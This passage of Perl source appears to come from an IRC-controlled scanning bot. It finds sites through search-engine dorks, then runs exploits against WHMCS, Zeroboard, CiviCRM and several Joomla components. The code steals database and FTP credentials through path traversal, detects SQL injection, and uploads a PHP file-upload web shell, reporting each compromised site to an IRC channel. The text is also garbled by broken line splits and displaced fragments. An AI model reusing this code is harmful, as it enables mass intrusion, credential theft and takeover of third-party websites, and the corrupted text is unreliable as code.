(OS=$os) uid=$uid "); &msg("$chanxxx","$thumbl ogo6$engine8 sHeLL4 ".$npath."0 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$admin","$thumblog o6$engine8 sHeLL ".$crut."0 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$thumblogo6 $engine8 sHeLL4 ".$crut."0 (SafeMode=$safe) (OS=$os) uid=$uid "); } &get_content($botc);sleep(1); &get_content($botpc);sleep(1); } } } exit; } if ($count == $num-1) { &msg("$chan","$thumblogo4$engine0 0Selesai......4! ") ; } } } }

sub whmcs_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$whmcslogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$whmcslogo6$engine 12Finished"); } my $test1 = "http://".$site.$bug."../../../configuration .php%00"; my $submit = "http://".$site.$subticket; my $html = &get_content($test1); if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { if ($html =~ /db_host/i) { my $userpass = &getUserPass($html); sleep(2); my $info = &getinfo($html); sleep(2); &msg("$chaninfo","$whmcslogo6$engine12 info 15[ 6htt p://".$site."15 ] 12$info"); my $lulz = "http://".$site; my $user = ""; my $pass = ""; my $user2 = ""; my $pass2 = ""; my $dtbs2 = ""; if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { my $host = $2; my @ftpu = split(":Viva-Byroe.Net:", $userpass); my @dbic = split(":Viva-Byroe.Net:", $info); $user = $ftpu[0]; $pass = $ftpu[1]; $user2 = $dbic[0]; $pass2 = $dbic[1]; $dtbs2 = $ dbic[2]; my $ftpstat = ""; if($user =~ /_/) { @userz = split("_", $ user); $user = $userz[0];} &ftp_connect($test1,$host,$user, $pass,$chan,$engine,$whmcslogo);sleep(1); &dbi_connect($host,$user2,$pass2 ,$dtbs2,$chan,$engine,$whmcslogo);sleep(1); } my $ceksubmit = &get_content($submit); if ($ceksubmit =~ /Urgency/i) { &msg("$submitchan","$whmcslogo6$e ngine12 Submit Ticket 15[6 ".$submit." 15]"); sleep(2); my $uploader = "http://".$site."/downloa ds/indexx.php"; my $uploader2 = "http://".$site."/templa tes_c/indexx.php"; my $cekup = &get_content($uploader); my $cekup2 = &get_content($uploader2); if ($cekup =~ /enctype=\"multipart\/form -data"/i) { &msg("$chanxxx","$whmcslogo6$engine12 Uploader 15[6 ".$uploader." 15]");& msg("$admin","$whmcslogo6$engine12 Uploader 15[12 ".$uploader." 15]"); } if ($cekup2 =~ /enctype=\"multipart\/for m-data"/i) { &msg("$chanxxx","$whmcslogo6$engine12 Uploader 15[6 ".$uploader2." 15]") ;&msg("$chanxxx","$whmcslogo6$engine12 Uploader 15[12 ".$uploader2." 15]"); } }

} } exit; } } } } sub ftp_connect { my $url = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { &msg("$admin","$logo6$engine12 FTP 15[ 12http://".$host." 15] er.":".$pass." 15]"); } } sub dbi_connect () { my $host = $_[0]; my $user = $_[1]; my $pass = $_[2]; my $dtbs = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $port = "3306"; my $platform = "mysql"; my $dsn = "dbi:$platform:$dtbs:$host:$port"; my $DBIconnect= DBI->connect($dsn,$user,$pass); if ($DBIconnect) { &msg("$chanxxx","$logo6$engine12 MySql 15[ 12http://".$host." onnected 15]"); } } sub getUserPass() { my $string = $_[0]; my @lol = split("\r\n", $string); my $pass = ""; my $user = ""; foreach my $line (@lol) { if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ db_password(.*?)=(.*?)"(.+?)";/i)) { $pass = $3; } if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ db_username(.*?)=(.*?)"(.+?)";/i)) { $user = $3; } } return $user.":Viva-Byroe.Net:".$pass; }

[4 ".$us

15] [4 C

m/

m/

sub getinfo() { my $string = $_[0]; my @lol = split("\r\n", $string); my $pass = ""; my $user = ""; my $dbs = ""; foreach my $line (@lol) { if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/ db_password(.*?)=(.*?)"(.+?)";/i)) { $pass = $3; } if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/ db_username(.*?)=(.*?)"(.+?)";/i)) { $user = $3; } if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_n ame(.*?)=(.*?)"(.+?)";/i)) { $dbs = $3; } } return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs; } sub zero_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zerologo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$zerologo6$engine 12 Finished"); } my $coba = "http://".$site.$bug; my $cek = &get_content($coba);sleep(1); if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { if ($cek =~ /Zeroboard/) { system("./zbc $coba 8 0");sleep(1); my $vulner1 = "http://".$site.$action."? cmd="; my $vulner2 = "http://".$site.$action.$w getdon; my $vulner3 = "http://".$site.$action.$l wpdon; my $vulner4 = "http://".$site.$action.$c urldon; my $vuln1 = "http://".$site."/data/vito. php"; my $check2 = &get_content($vulner1); if ($check2 =~ /vito-RawckerheaD/i) { if ($zerowget == 1) { my $coba1 = &get_content($vulner2);sleep(2); } if ($zerolwp == 1 ) { my $coba2 = &get_content($vulner3);sleep(2); } if ($zerocurl == 1) { my $coba3

= &get_content($vulner4);sleep(2); } my $check1 = &get_content($vuln1 ); if ($check1 =~ /vito-RawckerheaD /i) { my $safe = ""; my $os = ""; my $uid = ""; if ($check1 =~ m/SAFE_MO DE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;} if ($check1 =~ m/color=r ed><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;} if ($check1 =~ m/uid=(.* ?)gid=/) {$uid = $1;} &msg("$admin","$ zerologo6$engine12 sHeLL6 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$z erologo6$engine12 sHeLL6 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$chan","$zerologo6$ engine12 Cek dewe 15 $vulner1 "); } sleep(2); } } } exit; } } } } sub sql_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$sqllogo); my $num = scalar(@totexploit); if ($num > 0) { foreach my $site (@totexploit) { $count++; if ($count == $num-1) { &msg("$chan","$sqllogo 4$engine 0 Selesai"); } my $test = "http://".$site.$bug."'"; my $vuln = "http://".$site."4".$bug; my $sqlsite = "http://".$site.$bug; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/ Query failed/i || $html =~ m/SQL query failed/i || $html =~ m/Warning: mysql_ af fected_ rows()/i || $html =~ m/Warning: mysql_ client_ encoding()/i || $html =~ m/Warning: mysql_ close()/i || $html =~ m/Warning: mysql_ connect()/i || $html = ~ m/Warning: mysql_ create_ db()/i || $html =~ m/Warning: mysql_ data_ seek()/i || $html =~ m/Warning: mysql_ drop_ db()/i || $html =~ m/Warning: mysql_ escape_ string()/i || $html =~ m/Warning: mysql_ fetch_ array()/i || $html =~ m/Warning : mysql_ fetch_ assoc()/i || $html =~ m/Warning: mysql_ fetch_ field()/i || $htm l =~ m/Warning: mysql_ fetch_ object()/i || $html =~ m/Warning: mysql_ fetch_ le ngths()/i || $html =~ m/Warning: mysql_ fetch_ row()/i || $html =~ m/Warning: my sql_ field_ name()/i || $html =~ m/Warning: mysql_ field_ seek()/i || $html =~ m /Warning: mysql_ field_ table()/i || $html =~ m/Warning: mysql_ field_ flags()/i || $html =~ m/Warning: mysql_ field_ type()/i || $html =~ m/ Warning: mysql_ get_ client_ info()/i || $html =~ m/Warning: mysql_ get_ host_ i

nfo()/i || $html =~ m/Warning: mysql_ get_ proto_ info()/i || $html =~ m/Warning : mysql_ get_ server_ info()/i || $html =~ m/Warning: mysql_ info()/i || $html = ~ m/Warning: mysql_ list_ dbs()/i || $html =~ m/Warning: mysql_ list_ processes( )/i || $html =~ m/Warning: mysql_ list_ tables()/i || $html =~ m/Warning: mysql_ num_ fields()/i || $html =~ m/Warning: mysql_ num_ rows()/i || $html =~ m/Warni ng: mysql_ query()/i || $html =~ m/Warning: mysql_ select_ db()/i || $html =~ m/ Warning: mysql_ tablename()/i || $html =~ m/Warning: mysql_ unbuffered_ query()/ i ) { &msg("$chan","$sqllogo6$engine3 (4MySQL3)4 ".$vuln);} elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed qu otation mark/i || $html =~ m/Microsoft OLE DB Provider for/i || $html =~ m/unclo sed quotation|mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/i || $html =~ m/The error occurred while processing an element with a general identifier of (CFPARAM)/i ) { &msg("$chan","$sqllogo6$engine3 (13MsSQL3)13 ".$vuln);} elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Micros oft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) { &msg("$chan","$sqllogo6$engine3 (9MsSQL3)13 ".$vuln);} elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Micros oft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i || $htm l =~ m/ODBC Error Code = S1000 (General error)/i || $html =~ m/[Oracle][ODBC][Or a]ORA-00911: invalid character/i || $html =~ m/ADODB.Field error '80020009'/i || $html =~ m/Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)/i ) { &msg("$chan","$sqllogo6$engine3 (2MsAccess3)2 ".$vuln);} } exit; sleep(2); } } } } sub civicrm_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$civicrmlogo,$nick) ; my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$civicrmlogo 4$engine 0 Sele sai"); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/

plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_civicrm/civicrm/packages/OpenFlashChart//tmp-upload-images/load.php" ); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$civicrmlogo$engine sHeLL http://".$site."/adminis trator/components/com_civicrm/civicrm/packages/OpenFlashChart//tmp-upload-images /load.php OS: ".$1); sleep(3); } } exit; } sleep(2); } } } } sub acy_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$acylogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$acylogo 4$engine 0 Selesai" ); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_acymailing/inc/openflash//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$acylogo$engine sHeLL http://".$site."/administrat or/components/com_acymailing/inc/openflash//tmp-upload-images/load.php OS: ".$1) ; sleep(3); } } exit; } sleep(2); } } } } sub jnewsl_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jnewsllogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jnewsllogo 4$engine 0 Seles ai"); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_jnewsletter/includes/openflashchart//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) {

my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$jnewsllogo$engine sHeLL http://".$site."/administ rator/components/com_jnewsletter/includes/openflashchart//tmp-upload-images/load .php OS: ".$1); sleep(3); } } exit; } sleep(2); } } } } sub jinc_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jinclogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jinclogo 4$engine 0 Selesai "); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_jinc/classes/graphics//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$jinclogo$engine sHeLL http://".$site."/administra tor/components/com_jinc/classes/graphics//tmp-upload-images/load.php OS: ".$1);

sleep(3); } } exit; } sleep(2); } } } } sub mai_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$mailogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$mailogo 4$engine 0 Selesai" ); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_maianmedia/utilities/charts//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$mailogo$engine sHeLL http://".$site."/administrat or/components/com_maianmedia/utilities/charts//tmp-upload-images/load.php OS: ". $1); sleep(3); } } exit; } sleep(2);

} } } } sub jnews_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jnewslogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jnewslogo 4$engine 0 Selesa i"); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_jnews/includes/openflashchart//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$jnewslogo$engine sHeLL http://".$site."/administr ator/components/com_jnews/includes/openflashchart//tmp-upload-images/load.php OS : ".$1); sleep(3); } } exit; } sleep(2); } } } }

sub jnew_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jnewlogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jnewlogo 4$engine 0 Selesai "); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/components/com_jn ews/includes/openflashchart//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$jnewlogo$engine sHeLL http://".$site."/components /com_jnews/includes/openflashchart//tmp-upload-images/load.php OS: ".$1); sleep(3); } } exit; } sleep(2); } } } } ################################################################################ ## sub search_engine() { my (@total,@clean); my $chan = $_[0];

$bug = $_[1]; $dork = $_[2]; $engine = $_[3]; $logo = $_[4]; if ($gps == 1) { if ($engine eq "IndoAE") { my @Indoae = &Indo1($dork."+site:ae"); push(@tota l,@Indoae); } if ($engine eq "IndoAR") { my @Indoar = &Indo2($dork."+site:ar"); push(@tota l,@Indoar); } if ($engine eq "IndoAT") { my @Indoat = &Indo3($dork."+site:at"); push(@tota l,@Indoat); } if ($engine eq "IndoAU") { my @Indoau = &Indo4($dork."+site:au"); push(@tota l,@Indoau); } if ($engine eq "IndoBE") { my @Indobe = &Indo5($dork."+site:be"); push(@tota l,@Indobe); } if ($engine eq "IndoBG") { my @Indobg = &Indo6($dork."+site:bg"); push(@ total,@Indobg); } if ($engine eq "IndoBR") { my @Indobr = &Indo1($dork."+site:br"); push(@tota l,@Indobr); } if ($engine eq "IndoBY") { my @Indoby = &Indo2($dork."+site:by"); push(@ total,@Indoby); } if ($engine eq "IndoCA") { my @Indoca = &Indo3($dork."+site:ca"); push(@tota l,@Indoca); } if ($engine eq "IndoCL") { my @Indocl = &Indo4($dork."+site:cl"); push(@tota l,@Indocl); } if ($engine eq "IndoCK") { my @Indock = &Indo5($dork."+site:ck"); push(@tota l,@Indock); } if ($engine eq "IndoCN") { my @Indocn = &Indo6($dork."+site:cn"); push(@tota l,@Indocn); } if ($engine eq "IndoCO") { my @Indoco = &Indo1($dork."+site:co"); push(@tota l,@Indoco); } if ($engine eq "IndoCoM") { my @Indocom = &Indo2($dork."+site:com"); push(@t otal,@Indocom); } if ($engine eq "IndoCZ") { my @Indocz = &Indo3($dork."+site:cz"); push(@tota l,@Indocz); } if ($engine eq "IndoDE") { my @Indode = &Indo4($dork."+site:de"); push(@tota l,@Indode); } if ($engine eq "IndoEC") { my @Indoec = &Indo5($dork."+site:ec"); push(@tota l,@Indoec); } if ($engine eq "IndoEDU") { my @Indoedu = &Indo6($dork."+site:edu"); pus h(@total,@Indoedu); } if ($engine eq "IndoEE") { my @Indoee = &Indo1($dork."+site:ee"); push(@ total,@Indoee); } if ($engine eq "IndoES") { my @Indoes = &Indo2($dork."+site:es"); push(@tota l,@Indoes); } if ($engine eq "IndoEU") { my @Indoeu = &Indo3($dork."+site:eu"); push(@tota l,@Indoeu); } if ($engine eq "IndoFI") { my @Indofi = &Indo4($dork."+site:fi"); push(@ total,@Indofi); } if ($engine eq "IndoGR") { my @Indogr = &Indo5($dork."+site:gr"); push(@tota l,@Indogr); } if ($engine eq "IndoGOV") { my @Indogov = &Indo6($dork."+site:gov"); pus h(@total,@Indogov); } if ($engine eq "IndoFR") { my @Indofr = &Indo1($dork."+site:fr"); push(@ total,@Indofr); } if ($engine eq "IndoHU") { my @Indohu = &Indo2($dork."+site:hu"); push(@tota l,@Indohu); } if ($engine eq "IndoHK") { my @Indohk = &Indo3($dork."+site:hk"); push(@ total,@Indohk); } if ($engine eq "IndoHR") { my @Indohr = &Indo4($dork."+site:hr"); push(@

my my my my

total,@Indohr); } if ($engine eq "IndoID") { my @Indoid = &Indo5($dork."+site:id"); push(@tota l,@Indoid); } if ($engine eq "IndoIL") { my @Indoil = &Indo6($dork."+site:il"); push(@tota l,@Indoil); } if ($engine eq "IndoIN") { my @Indoin = &Indo1($dork."+site:in"); push(@tota l,@Indoin); } if ($engine eq "IndoInfO") { my @Indoinfo = &Indo2($dork."+site:info"); push (@total,@Indoinfo); } if ($engine eq "IndoIR") { my @Indoir = &Indo3($dork."+site:ir"); push(@tota l,@Indoir); } if ($engine eq "IndoIT") { my @Indoit = &Indo4($dork."+site:it"); push(@tota l,@Indoit); } if ($engine eq "IndoJP") { my @Indojp = &Indo5($dork."+site:jp"); push(@tota l,@Indojp); } if ($engine eq "IndoKR") { my @Indokr = &Indo6($dork."+site:kr"); push(@tota l,@Indokr); } if ($engine eq "IndoLV") { my @Indomx = &Indo1($dork."+site:lv"); push(@tota l,@Indolv); } if ($engine eq "IndoMD") { my @Indomd = &Indo2($dork."+site:md"); push(@ total,@Indomd); } if ($engine eq "IndoMX") { my @Indomx = &Indo3($dork."+site:mx"); push(@ total,@Indomx); } if ($engine eq "IndoMY") { my @Indomy = &Indo4($dork."+site:my"); push(@tota l,@Indomy); } if ($engine eq "IndoNeT") { my @Indonet = &Indo5($dork."+site:net"); push(@t otal,@Indonet); } if ($engine eq "IndoNO") { my @Indono = &Indo6($dork."+site:no"); push(@ total,@Indono); } if ($engine eq "IndoNL") { my @Indonl = &Indo1($dork."+site:nl"); push(@tota l,@Indonl); } if ($engine eq "IndoNZ") { my @Indonz = &Indo2($dork."+site:nz"); push(@ total,@Indonz); } if ($engine eq "IndoOrG") { my @Indoorg = &Indo3($dork."+site:org"); push(@t otal,@Indoorg); } if ($engine eq "IndoPH") { my @Indoph = &Indo4($dork."+site:ph"); push(@tota l,@Indoph); } if ($engine eq "IndoPK") { my @Indopk = &Indo5($dork."+site:pk"); push(@ total,@Indopk); } if ($engine eq "IndoPL") { my @Indopl = &Indo6($dork."+site:pl"); push(@tota l,@Indopl); } if ($engine eq "IndoPT") { my @Indopt = &Indo1($dork."+site:pt"); push(@ total,@Indopt); } if ($engine eq "IndoRO") { my @Indoro = &Indo2($dork."+site:ro"); push(@tota l,@Indoro); } if ($engine eq "IndoRU") { my @Indoru = &Indo3($dork."+site:ru"); push(@tota l,@Indoru); } if ($engine eq "IndoSE") { my @Indose = &Indo4($dork."+site:se"); push(@ total,@Indose); } if ($engine eq "IndoSG") { my @Indosg = &Indo5($dork."+site:sg"); push(@ total,@Indosg); } if ($engine eq "IndoTH") { my @Indoth = &Indo6($dork."+site:th"); push(@tota l,@Indoth); } if ($engine eq "IndoTK") { my @Indotk = &Indo1($dork."+site:tk"); push(@ total,@Indotk); } if ($engine eq "IndoTR") { my @Indotr = &Indo2($dork."+site:tr"); push(@ total,@Indotr); } if ($engine eq "IndoTV") { my @Indotv = &Indo3($dork."+site:tv"); push(@ total,@Indotv); } if ($engine eq "IndoTW") { my @Indotw = &Indo4($dork."+site:tw"); push(@

